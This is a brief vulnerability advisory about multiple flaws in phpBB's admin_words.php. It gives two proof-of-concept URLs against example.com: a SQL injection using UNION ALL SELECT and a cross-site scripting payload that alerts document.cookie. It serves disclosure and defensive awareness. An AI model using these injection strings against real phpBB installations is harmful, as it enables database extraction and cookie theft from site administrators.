PhpBB admin_words.php Multiple Vulnerabilities

PhpBB admin_words.php Multiple Vulnerabilities

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*
http://www.example.com/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(document.cookie);</script